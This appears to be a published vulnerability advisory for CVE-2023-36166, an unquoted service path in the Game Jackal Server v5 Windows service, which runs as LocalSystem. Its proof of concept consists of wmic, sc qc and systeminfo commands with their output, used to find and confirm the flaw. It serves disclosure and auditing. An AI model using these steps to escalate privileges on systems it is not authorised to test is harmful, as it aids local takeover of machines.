Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

2023.07.11

Credit: Idan Malihi

Risk: Medium

Local: Yes

Remote: No

CVE: CVE-2023-36166

CWE: CWE-428: Unquoted Service Path

# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto
C:\Users>sc qc GJServiceV5
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GJServiceV5
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Game Jackal Server v5
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
OS Manufacturer: Microsoft Corporation

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.